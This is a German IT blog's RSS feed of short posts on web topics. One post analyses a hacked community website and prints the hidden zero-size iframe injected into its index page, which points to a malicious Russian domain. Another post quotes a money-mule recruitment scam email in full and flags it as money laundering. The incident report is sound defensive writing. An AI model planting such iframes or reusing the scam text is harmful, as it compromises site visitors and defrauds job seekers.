<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Glorf IT &#187; WebTech</title>
	<atom:link href="http://www.glorf.it/blog/category/webtech/feed" rel="self" type="application/rss+xml" />
	<link>http://www.glorf.it/blog</link>
	<description>Bedenkliches aus dem IT-Alltag</description>
	<lastBuildDate>Sat, 28 Jan 2012 11:24:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>Nette 404-Meldungen</title>
		<link>http://www.glorf.it/blog/2011/11/24/webtech/nette-404-meldungen</link>
		<comments>http://www.glorf.it/blog/2011/11/24/webtech/nette-404-meldungen#comments</comments>
		<pubDate>Thu, 24 Nov 2011 17:23:45 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[404]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6583</guid>
		<description><![CDATA[Alter, aber guter Link-Tipp: &#34;50 Cool and Creative 404 Error Pages (Part I)&#34; Bitte beachten: der obige Titel aus dem Jahre 2009 ist nicht ganz korrekt. &#34;Teil I&#34; legt nahe, dass es einen Teil 2 g&#228;be. Gibt es aber (noch?) nicht. Es sind nur 25 Meldungen beschrieben, der Rest sollte wohl im Teil 2 folgen. [...]]]></description>
			<content:encoded><![CDATA[<p>Alter, aber guter Link-Tipp: &quot;<a href="http://www.boredpanda.com/50-cool-and-creative-404-error-pages/">50 Cool and Creative 404 Error Pages (Part I)</a>&quot;</p>
<p>Bitte beachten: der obige Titel aus dem Jahre 2009 ist nicht ganz korrekt.</p>
<ul>
<li>&quot;Teil I&quot; legt nahe, dass es einen Teil 2 g&#228;be. Gibt es aber (noch?) nicht.</li>
<li>Es sind nur 25 Meldungen beschrieben, der Rest sollte wohl im Teil 2 folgen.</li>
</ul>
<p>Aber es sind wirklich kreative 404er Meldungen von verschiedenen Webseiten.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/11/24/webtech/nette-404-meldungen/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Modernizr</title>
		<link>http://www.glorf.it/blog/2011/11/22/webtech/modernizr</link>
		<comments>http://www.glorf.it/blog/2011/11/22/webtech/modernizr#comments</comments>
		<pubDate>Tue, 22 Nov 2011 22:14:27 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Webseite]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6392</guid>
		<description><![CDATA[Aus meinem unersch&#246;pflichem Stack an Dingen, die ich mal ausprobieren wollte: Mein Kollege Robert brachte von einem Vortrag aus der Reihe &#34;MSDN on Tour&#34; zum Thema HTML5 diesen LinkTipp mit: Modernizr. Das ist eine JavaScript-Bibliothek, um schnell und einfach moderne Webseiten zu erm&#246;glichen. Ich werde es wohl nicht mehr schaffen das anzuschauen, aber bevor es [...]]]></description>
			<content:encoded><![CDATA[<p>Aus meinem unersch&#246;pflichem Stack an Dingen, die ich mal ausprobieren wollte: Mein Kollege Robert brachte von einem Vortrag aus der Reihe &quot;MSDN on Tour&quot; zum Thema HTML5 diesen LinkTipp mit: <a href="http://www.modernizr.com/">Modernizr</a>. </p>
<p>Das ist eine JavaScript-Bibliothek, um schnell und einfach moderne Webseiten zu erm&#246;glichen. Ich werde es wohl nicht mehr schaffen das anzuschauen, aber bevor es veraltet gebe ich den Tipp mal weiter&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/11/22/webtech/modernizr/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Netter Google Hack</title>
		<link>http://www.glorf.it/blog/2011/11/19/webtech/google/netter-google-hack</link>
		<comments>http://www.glorf.it/blog/2011/11/19/webtech/google/netter-google-hack#comments</comments>
		<pubDate>Sat, 19 Nov 2011 15:15:27 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[Google]]></category>
		<category><![CDATA[Google Joke]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6485</guid>
		<description><![CDATA[Gebt mal &#34;do a barrel roll&#34; bei Google ein&#8230;]]></description>
			<content:encoded><![CDATA[<p>Gebt mal &quot;do a barrel roll&quot; bei <a href="http://www.google.de/#hl=de&#038;cp=4&#038;gs_id=m&#038;xhr=t&#038;q=do+a+barrel+roll">Google</a> ein&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/11/19/webtech/google/netter-google-hack/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Tracking leicht gemacht</title>
		<link>http://www.glorf.it/blog/2011/05/25/webtech/tracking-leicht-gemacht</link>
		<comments>http://www.glorf.it/blog/2011/05/25/webtech/tracking-leicht-gemacht#comments</comments>
		<pubDate>Wed, 25 May 2011 19:54:03 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Facebook]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6143</guid>
		<description><![CDATA[In letzter Zeit h&#228;ufen sich die Webseiten bei denen ich kleine Teile der Webseite nicht richtig sehe: Immer wenn IFrames von fremden Seiten eingebettet werden, z.B. bei Spiegel.de. Meistens handelt es sich dabei um Facebook. Im Bild rechts kann man ganz gut sehen, dass ein IFrame geladen wird mit der Adresse der aktuell besuchten Webseite. [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.glorf.it/blog/wp-content/uploads/2011/05/iframe.jpg" alt="" title="Facebook-IFrame" width="661" height="180" class="alignright size-full wp-image-6144" style="border-width:2px; border-style:solid; margin: 5px;" />In letzter Zeit h&#228;ufen sich die Webseiten bei denen ich kleine Teile der Webseite nicht richtig sehe: Immer wenn IFrames von fremden Seiten eingebettet werden, z.B. bei Spiegel.de. Meistens handelt es sich dabei um Facebook. Im Bild rechts kann man ganz gut sehen, dass ein IFrame geladen wird mit der Adresse der aktuell besuchten Webseite. W&#228;re das bei mir nicht blockiert, dann w&#252;rde dank Cockies durchaus noch mehr passieren. Was dabei genau passiert wird in dem Heise-Artikel &quot;<a href="http://www.heise.de/security/artikel/Das-verraet-Facebooks-Like-Button-1230906.html">Das Like-Problem &#8211; Was Facebooks Gef&#228;llt-Mir-Buttons verraten</a>&quot; ganz gut beschrieben. Hier ein Auszug:</p>
<blockquote><p>Dabei sendet der Browser an Facebook unter anderem als Referer die URL der gerade ge&#246;ffneten Spiegel-Seite. Au&#223;erdem schickt er dem Facebook-Server auch das von ihm bereits fr&#252;her gesetzte Cookie. Ist der Anwender gerade in einem anderen Fenster bei Facebook angemeldet, enth&#228;lt das seine Sitzungs-ID. Damit kann Facebook diesen Aufruf der Spiegel-Seite einer konkreten Person zu ordnen.</p>
<p>Konkret kann Facebook also w&#228;hrend Sie dort angemeldet sind beobachten, welche Web-Seiten Sie aufrufen, sofern diese einen solchen Like-Button enthalten. Angesichts des Erfolgs des sozialen Netzwerks nimmt deren Zahl st&#228;ndig zu. Und anders als Statistik-Server wie Google Analytics, die IVW oder auch die Server von Anzeigen-Dienstleistern, die mit anonymisierten Daten oder schlimmstenfalls IP-Adressen arbeiten, kann Facebook diese Daten direkt mit einer realen Person verkn&#252;pfen, deren Adresse und Freunde es kennt.[&#8230;]</p></blockquote>
<p>Das mit dem Like-Button war schon eine schlaue Idee von Facebook&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/05/25/webtech/tracking-leicht-gemacht/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fairlangen.org wieder entseucht</title>
		<link>http://www.glorf.it/blog/2011/04/26/webtech/fairlangen-org-wieder-entseucht</link>
		<comments>http://www.glorf.it/blog/2011/04/26/webtech/fairlangen-org-wieder-entseucht#comments</comments>
		<pubDate>Tue, 26 Apr 2011 15:45:05 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Hacker]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6067</guid>
		<description><![CDATA[In unserer Gemeinde betreiben einige Engagierte die sehr erfolgreiche Web-Seite Fairlangen.org. Dabei geht es darum sich dar&#252;ber auszutauschen, wo man in Erlangen fair gehandelte Waren kaufen kann. &#220;ber Wege, die mir noch nicht klar sind, hat ein B&#246;sewicht Zugang zu dem FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und [...]]]></description>
			<content:encoded><![CDATA[<p>In unserer <a href="http://www.elia-erlangen.de">Gemeinde</a> betreiben einige Engagierte die sehr erfolgreiche Web-Seite <a href="http://www.fairlangen.org">Fairlangen.org</a>. Dabei geht es darum sich dar&#252;ber auszutauschen, wo  man in Erlangen fair gehandelte Waren kaufen kann. &#220;ber Wege, die mir noch nicht klar sind, hat ein B&#246;sewicht Zugang zu <em>dem</em> FTP-Passwort der Seite bekommen und ein paar der dort vorhandenen Index-Seiten (index.htm, index.html und index.php) mit einem b&#246;sartigen Code-Snippet verseucht. Wirksam war dabei aber lediglich die Seite &quot;index.php&quot;. Einem Menschen w&#228;re sicher sofort aufgefallen, dass die index.htm und index.html nur &#252;ber einen direkten Link aufgerufen werden konnten und eigentlich sinnlos waren (jetzt sind sie Geschichte). Daher vermute ich, dass das alles automatisiert erfolgte.</p>
<p>Einen der <a href="http://www.glorf.it/blog/2011/04/26/webtech/ftp-log-file-verstehen">Log-Eintr&#228;ge</a> habe ich bereits vorher erkl&#228;rt (ist nur an zwei Stellen anonymisiert):</p>
<div class="codesnip-container" >Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c<br />
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c</div>
<p>Daran sieht man, dass nicht unser Webserver kompromittiert und dann der Schadcode via CMS eingeschleust wurde, sondern der FTP-Zugriff von einem anderen System (<a href="http://whois.domaintools.com/174.37.220.147">174.37.220.147</a> sind wir nicht) erfolgte. HIer sieh man, wie eine der verseuchten Dateien gespeichert, manipuliert und noch in der gleichen Sekunde wieder hoch geladen wurde. Danach war sie um ein iframe reicher (Bitte nicht der URL folgen, ist absichtlich kein Link!):</p>
<div class="codesnip-container" >&lt;iframe src=&quot;http://quake2012.ru/in.php?a=QQkFBwQHBAEABQQMEkcJBQcEBwAEAwUBAw==&quot; width=&quot;0&quot; height=&quot;0&quot; frameborder=&quot;0&quot;&gt;&lt;/iframe&gt;</div>
<p>Aus naheliegenden Gr&#252;nden habe ich nicht ausprobiert, was dieser fremde Link f&#252;r Code nachlud. Ich hoffe, dass er nicht viel Schaden anrichtete. Unsere Seite w&#252;rde n&#228;mlich sehr schnell von einschl&#228;gigen Seiten als b&#246;sartig eingestuft. Daher warnten Firefox, Safari und Google vor dem Besuch unserer Seite. </p>
<p>Nach der &#196;nderung aller Passw&#246;rter  (und dem Eintragen der DB-Passw&#246;rter in tausend INIs) und der Bereinigung der Seite, fing die eigentlich Arbeit an. Weil mir unklar war, wie der Gauner an das FTP-Passwort kam (der eigentliche Betreuer der Webseite ist in Urlaub), konnte ich nur vermuten. Es sieht nicht danach aus, als w&#228;re die Seite kompromittiert worden, sondern eher der Rechner eines der FTP-Nutzer dieser Seite. Trotzdem habe ich s&#228;mtliche Software darauf aktualisiert, das war ohnehin f&#228;llig.</p>
<p>Aus der Erfahrung meine Tipps in der Situation:</p>
<ul>
<li>cool bleiben und nichts einfach l&#246;schen</li>
<li>Die Dom&#228;ne einfach mal in ein leeres Unterverzeichnis umleiten oder wenigstens die Index-Seiten als erstes einfach mal umbenennen, um die Leser mit &#228;lteren Browsern, die nicht warnen, zu sch&#252;tzen.</li>
<li>Das FTP-Passwort &#228;ndern.</li>
<li>Wenn genug Bandbreite da ist (sehr zu empfehlen): Den aktuellen, verseuchten Stand lokal sichern, sonst nur die infizierten Dateien separat speichern.</li>
<li>Mittels einen DIFF-Tool, wie bspw. <a href="http://www.scootersoftware.com/">BeyondCompare</a> (billig und gut) den aktuellen Stand auf dem Webserver mit der letzten lokalen Sicherung vergleichen und die betroffenen Dateien ermitteln. </li>
<li>Die Log-Dateien sichten, bei uns wurde ich schnell im FTP-Log f&#252;ndig.</li>
<li>Mit der letzten Sicherung zur&#252;ck setzen.</li>
<li>Alle Passw&#246;rter &#228;ndern, die in irgendwelchen Dateien stehen, selbst wenn die Dateien nicht per FTP herunter geladen wurden. Ein B&#246;sling k&#246;nnte sie auch per PHP zippen und dann als Zip runter laden. Ich pers&#246;nlich wurde das auch tun, wenn ich in den Logs genau sehen kann, dass sonst nicht weiter herunter geladen wurde.</li>
<li>Dom&#228;ne wieder auf den nun sauberen Stand umleiten und n&#246;tigenfalls Updates aller Software einspielen.</li>
<li>Google, Firefox, etc davon &#252;berzeugen, dass wir wieder zu den Guten geh&#246;ren.</li>
</ul>
<p>Das Timing war &#252;brigens perfekt: Der eigentliche Betreuer in Urlaub, mein griffbereites letztes Backup Monate alt, Ostern, sch&#246;nes Wetter, &#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/04/26/webtech/fairlangen-org-wieder-entseucht/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>FTP-Log-File verstehen</title>
		<link>http://www.glorf.it/blog/2011/04/26/webtech/ftp-log-file-verstehen</link>
		<comments>http://www.glorf.it/blog/2011/04/26/webtech/ftp-log-file-verstehen#comments</comments>
		<pubDate>Tue, 26 Apr 2011 15:05:18 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[FTP-Logs lesen]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=6057</guid>
		<description><![CDATA[Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein B&#246;sewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: WU-FTPD &#8211; Manual: xferlog.5. Hier ein Beispiel aus dem echten Leben: Tue Apr [...]]]></description>
			<content:encoded><![CDATA[<p>Am Wochenende musste ich kurzfristig die Log-Files eines FTP-Servers unserer Gemeinde analysieren und kam zum Schluss, dass ein B&#246;sewicht wohl an das FTP-Passwort gekommen sein muss. Die lange Fassung folgt noch. HIer mal vorab der Link, wie man die LogFiles verstehen kann: <a href='http://wu-ftpd.therockgarden.ca/man/xferlog.html'>WU-FTPD &#8211; Manual: xferlog.5</a>.</p>
<p>Hier ein Beispiel aus dem echten Leben:</p>
<div class="codesnip-container" >Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 65 /www/htdocs/xxxxxxxx/index.htm b _ o r yyyyyyyy ftp 0 * c<br />
Tue Apr 19 14:02:55 2011 0 ::ffff:174.37.220.147 198 /www/htdocs/xxxxxxxx/index.htm b _ i r yyyyyyyy ftp 0 * c</div>
<p>Das bedeutet:</p>
<ul>
<li>Am 19.4.2011 um 14:02 wurde </li>
<li>die Datei &quot;index.htm&quot; aus dem Rootverzeichnis (Verzeichnis anonymisiert)</li>
<li>mit der Gr&#246;&#223;e 65 Bytes heruntergeladen </li>
<li>vom FTP-Benutzer yyyyyyyy von der IP-Adresse <a href="http://whois.domaintools.com/174.37.220.147">174.37.220.147</a></li>
<li>gelesen (&quot;o&quot; f&#252;r &quot;output&quot;).</li>
<li>Und sofort danach mit der Gr&#246;&#223;e 198 Bytes hoch geladen.</li>
</ul>
<p>Weitere Infos findet man im <a href='http://wu-ftpd.therockgarden.ca/man/xferlog.html'>WU-FTPD &#8211; Manual: xferlog.5</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/04/26/webtech/ftp-log-file-verstehen/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Danke f&#252;r Ihre Bewerbung</title>
		<link>http://www.glorf.it/blog/2011/02/09/webtech/spamlinktausch/danke-fuer-ihre-bewerbung</link>
		<comments>http://www.glorf.it/blog/2011/02/09/webtech/spamlinktausch/danke-fuer-ihre-bewerbung#comments</comments>
		<pubDate>Wed, 09 Feb 2011 17:30:34 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[Spam/Linktausch]]></category>
		<category><![CDATA[Nepp]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5809</guid>
		<description><![CDATA[Heute bekam ich eine Antwort auf eine Bewerbung, die ich nicht schrieb: [&#8230;] Received: from mail1.asiacloudhosting.com (mail2.asiacloudhosting.com [111.90.129.166]) by dd20200.kasserver.com (Postfix) with ESMTP id 09F3F181D9B5A for ; Wed, 9 Feb 2011 07:10:09 +0100 (CET) Received: from 84.127.18.120.dyn.user.ono.com (84.127.18.120.dyn.user.ono.com [84.127.18.120]) by mail.asiacloudhosting.com with SMTP; Wed, 9 Feb 2011 13:54:41 +0800 Subject: Bewerbung als Manager Kassierer From: [...]]]></description>
			<content:encoded><![CDATA[<p>Heute bekam ich eine Antwort auf eine Bewerbung, die ich nicht schrieb:</p>
<blockquote><p>[&#8230;]<br />
Received: from mail1.asiacloudhosting.com (mail2.asiacloudhosting.com [111.90.129.166])<br />
	by dd20200.kasserver.com (Postfix) with ESMTP id 09F3F181D9B5A<br />
	for <webmaster@elia-gemeinschaft.de>; Wed,  9 Feb 2011 07:10:09 +0100 (CET)<br />
Received: from 84.127.18.120.dyn.user.ono.com (84.127.18.120.dyn.user.ono.com [84.127.18.120]) by mail.asiacloudhosting.com with SMTP;<br />
   Wed, 9 Feb 2011 13:54:41 +0800<br />
Subject: Bewerbung als Manager Kassierer<br />
From: sales@ezstamp.com.my<br />
To: webmaster@[&#8230;]<br />
Date: Wed,  9 Feb 2011 07:10:09 +0100 (CET)</p>
<p>Guten Tag,</p>
<p>die Geschaftsleitung unserer Firma dankt Ihnen ganz herzlich dafur, dass Sie sich fur unsere Stellenausschreibungen interessiert haben.<br />
Die Gesellschaft KiwiClimate positioniert sich als ein Dealer der gro?ten Hersteller der Klimagerate, wie z.B. SAMSUNG, YORK, LG. Uberdies ist unsere Gesellschaft ein Handelsvertreter von AIRELEC Firmen (diese Firmen produzieren Heizaggregate), von VIESSMANN (das ist eine Firma aus Deutschland, die Dampferzeuger produziert), von Systemair (eine schwedische Firma, die sich mit Beluftungs- und Heizungsanlagenherstellung beschaftigt), von LIEBERT-HIROSS und UNIFLAIR (italienische Unternehmen, die im Bereich der Herstellung von feinen Klimageraten fur Telekommunikationen, Computerzentren und Kommunikationen tatig sind) und von  Soler&#038;Palau, (eine spanische Firma, die Beluftungsgerate produziert). KiwiClimate mochte ein ausfuhrliches Leistungsangebot unseren ukrainischen Partnern und Kunden in den anderen Republiken prasentieren. Um es zu schaffen, bemuhen wir uns ein Netz der Dealer in der ganzen Ukraine zu formen. Wir stellen unseren korporativen Partnern und Dealer spezielle An<br />
 gebote zur Verfugung. Diese Angebote schlie?en nachfolgende Plus ein: gunstigere Preise, breites Sortiment an Geraten, gute Lieferungs- und Zahlungstermine, verschiedene  Moglichkeiten als Unterlieferant sich mit der Lieferung der Gerate und ET, ihrer Montage und Inbetriebnahme zu beschaftigen. Au?erdem kann man als Dealer Servicedienstleistungen erbringen, Schulungen des Personals vor Ort organisieren und Werbungsprogramme unterstutzen.<br />
Da unsere Firma sich stabil entwickelt und erweitert suchen wir jetzt aktive und verantwortungsbewusste Personen, die sich fur einen seriosen Job interessieren und die sich einigen Problemen mit Steuern in unserem Staat gegenuber mit Verstandnis verhalten werden. Zuerst mochten wir gerne die ukrainische Situation bezuglich Wirtschaft darstellen. Dafur stellen wir Ihnen die Angaben einer aufschlussreichen Analyse zur Verfugung. Diese Analyse, die eben PayingTaxes hei?t, wurde zusammen von der Weltbank und von der Wirtschaftsprufungsgesellschaft  PriceWaterhouseCoopers durchgefuhrt. Laut dieser Bewertung kann man sagen, dass die Steuerwirtschaft in der Ukraine sich zu lastigsten weltlichen Systemen zahlt. Das kann leicht illustriert werden: 99 verschiedene Arten von Steuern ist die Zahlungspflicht fur  die Geschaftsleute in der Ukraine. Zeitaufwand fur alle diesen Zahlungsoperationen betragt etwa 2 Tausend Stunden! Davon ausgehend, bekommt der Staatsschatz ca. 72% des Gewinns d<br />
 er Firmen, die legal arbeiten. Die Steuerwirtschaft in der Ukraine kann man als ein sehr kompliziertes System bezeichnen, geschweige denn, dass der Staat selbst die Gesetze immer wieder andert (die Presse gab folgende Angaben als Beispiel: das ukrainische Mehrwertsteuergesetz beinhaltet mehr als 500 Abanderungen, dafur wurden 100 zusatzliche Gesetze erstellt). In der Steuerwirtschaft der Ukraine sollen unbedingt Reformen durchgefuhrt werden, die zur Optimierung des o.g. Systems fuhren sollen. Die Auditoren von PriceWaterhouseCoopers meinen, es sei sehr schwierig sich mit einem rechtlichen Business in der Ukraine zu beschaftigen. Deshalb versuchen die Firmen optimale Steuerbedingungen fur sich auszusuchen. In erster Linie hat das Bedeutung wenn die Firma sich eroffnet, reorganisiert, andert ihre Aktivitaten, sucht neuen Personal usw.<br />
Eine Position, die man als extra verantwortungsvoll bezeichnen kann ist die Stelle eines Manager-Kassierers. Das ist eine Person, die mit regionalen korporativen Geschaftspartnern was zu tun hat. Obwohl, wie gesagt, diese Position viel Verantwortung beinhaltet, verlangt sie keinen gro?en Aufwand. Als unsere Hauptanforderungen konnen wir folgendes nennen: Sie sollten fahig sein Prasentationen durchzufuhren; mit den Leuten positiv zu kommunizieren und damit mit denen gute und stabile Geschaftsbeziehungen zu bilden; Vertrauen der Partner zu gewinnen und aufrechtzuerhalten; die Zahlungen fur die Waren und Leistungen, die jeweils geliefert und erbracht wurden, zu uberwachen; Umsatz im Zahlungsverkehr in der Betriebsbuchhaltung beim Stammhaus durch marktfahige Systeme der Zahlungen zu kontrollieren; mit gutem Erfolg zu verhandeln und dabei ganz ehrlich zu sein.<br />
Falls Sie alles gut verstanden haben und mit uns gerne arbeiten mochten, dann waren wir sehr froh von Ihnen eine Antwort zu bekommen und danach Ihnen weitere Anweisungen zur Verfugung zu stellen. Unsere Geschaftbeziehungen werden vertraglich rechtskraftig beurkundet, weil wir mit Ihnen eine Vereinbarung bezuglich Ihrer Dienstleistungen als unser Agent schlie?en.  </p>
<p>Wenn Sie bereit sind anzufangen und fur Sie dabei alles klar ist, dann bitte kontaktieren dir@kiwiclimate.biz Sie uns noch mal fur weitere Anweisungen. </p>
<p>Herzliche Gru?e,</p></blockquote>
<p>Verstehe ich das richtig, dass hier Leute zum Zweck der Geldw&#228;sche gesucht werden?</p>
<p>Die Dom&#228;ne <a href="http://whois.domaintools.com/kiwiclimate.biz">kiwiclimate.biz</a> wurde jedenfalls erst vor genau 6 Tagen auf einen Besitzer in Frankreich registriert, unter der angegebenen Mailadresse wurden offenbar schon <a href="http://whois.domaintools.com/privacy-protect.cn">588 Dom&#228;nen</a> reserviert. Eine Webseite www.kiwiclimate.biz gibt es nicht&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2011/02/09/webtech/spamlinktausch/danke-fuer-ihre-bewerbung/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>Amazon.de nicht erreichbar [Update]</title>
		<link>http://www.glorf.it/blog/2010/12/12/webtech/amazon-de-nicht-erreichbar</link>
		<comments>http://www.glorf.it/blog/2010/12/12/webtech/amazon-de-nicht-erreichbar#comments</comments>
		<pubDate>Sun, 12 Dec 2010 21:36:49 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Amazon]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5654</guid>
		<description><![CDATA[Seit etwa 30min ist Amazon.de nicht mehr erreichbar. W&#228;hrend man bei Heise.de nachlesen kann, dass Amazon nicht im Fokus steht (&#34;Einfach gesagt: Einen gro&#223;en Online-Einzelh&#228;ndler anzugreifen, wenn die Leute Geschenke f&#252;r ihre Lieben kaufen, w&#228;re geschmacklos.&#34;), kocht die Ger&#252;chtek&#252;che hoch&#8230; Aber Genaues wei&#223; man nicht. Meine wichtigste Geschenk-Bestellung konnte ich zum Gl&#252;ck noch platzieren. Update [...]]]></description>
			<content:encoded><![CDATA[<p>Seit etwa 30min ist <a href="http://www.amazon.de">Amazon.de</a> nicht mehr erreichbar. W&#228;hrend man bei <a href="http://www.heise.de/newsticker/meldung/Wikileaks-Andauernde-Proteste-und-neue-Enthuellungen-1151314.html">Heise.de</a> nachlesen kann, dass Amazon nicht im Fokus steht (&quot;Einfach gesagt: Einen gro&#223;en Online-Einzelh&#228;ndler anzugreifen, wenn die Leute Geschenke f&#252;r ihre Lieben kaufen, w&#228;re geschmacklos.&quot;), <a href="http://topschlagzeilen.de/amazon-de-down-webseite-von-amazon-nicht-erreichbar-36367">kocht die Ger&#252;chtek&#252;che</a> hoch&#8230;<br />
Aber Genaues wei&#223; man nicht. Meine wichtigste Geschenk-Bestellung konnte ich zum Gl&#252;ck noch platzieren.</p>
<p><strong>Update 13.12.2010:</strong> Bei <a href="http://www.heise.de/newsticker/meldung/Amazon-Ausfaelle-bei-den-europaeischen-Websites-1151827.html">Heise.de</a> steht der Grund: ein Hardwareausfall. Wenn die richtige Hardware ausf&#228;llt, dann nutzt es rein gar nichts, wenn der Rest redundant ist&#8230; <img src='http://www.glorf.it/blog/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2010/12/12/webtech/amazon-de-nicht-erreichbar/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE6 und IE7 Detection-Script</title>
		<link>http://www.glorf.it/blog/2010/10/28/webtech/ie6-und-ie7-detection-script</link>
		<comments>http://www.glorf.it/blog/2010/10/28/webtech/ie6-und-ie7-detection-script#comments</comments>
		<pubDate>Thu, 28 Oct 2010 18:17:57 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Internet-Explorer]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5506</guid>
		<description><![CDATA[Im Artikel &#34;IE6 und IE7 Detection Script zur Einbindung auf der eigenen Webseite&#34; beschreibt Kay Giza wie und unter welchen Bedingungen man das &#34;IE6 und IE7 Detection Script&#34; in die eigene Webseite einbinden kann. Einen kurzen Abriss, was es damit auf sich hat, gab ich im Artikel &#34;Immer noch weg mit dem IE6&#34; wieder: Alte [...]]]></description>
			<content:encoded><![CDATA[<p>Im Artikel &quot;<a href="http://www.giza-blog.de/IE6UndIE7DetectionScriptZurEinbindungAufDerEigenenWebseite.aspx">IE6 und IE7 Detection Script zur Einbindung auf der eigenen Webseite</a>&quot; beschreibt Kay Giza wie und unter welchen Bedingungen man das &quot;IE6 und IE7 Detection Script&quot; in die eigene Webseite einbinden kann. Einen kurzen Abriss, was es damit auf sich hat, gab ich im Artikel &quot;<a href="http://www.glorf.it/blog/2010/10/12/webtech/immer-noch-weg-mit-dem-ie6">Immer noch weg mit dem IE6</a>&quot; wieder: Alte Internet-Explorer-Versionen erkennen und zum Update oder Umstieg bewegen&#8230; Erfreulicherweise geht die Initiative von Microsoft aus. <img src='http://www.glorf.it/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.glorf.it/blog/2010/10/28/webtech/ie6-und-ie7-detection-script/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Immer noch weg mit dem IE6</title>
		<link>http://www.glorf.it/blog/2010/10/12/webtech/immer-noch-weg-mit-dem-ie6</link>
		<comments>http://www.glorf.it/blog/2010/10/12/webtech/immer-noch-weg-mit-dem-ie6#comments</comments>
		<pubDate>Tue, 12 Oct 2010 20:35:02 +0000</pubDate>
		<dc:creator>Thomas</dc:creator>
				<category><![CDATA[WebTech]]></category>
		<category><![CDATA[Browser]]></category>
		<category><![CDATA[Internet-Explorer]]></category>

		<guid isPermaLink="false">http://www.glorf.it/blog/?p=5432</guid>
		<description><![CDATA[Nachdem ich den Artikel &#34;weg mit dem IE6&#34; auf freundliche Bitte von Microsoft entfernte, bin ich Euch noch eine entsch&#228;rfte Variante schuldig. Microsoft nahm daran Ansto&#223;, dass ich einfach aus der Mail zu der Aktion zitierte. Nun endlich komme ich dazu einen Artikel ganz frei von anst&#246;&#223;igen Microsoft-Aussagen zu machen. Hintergrund sind die immer noch [...]]]></description>
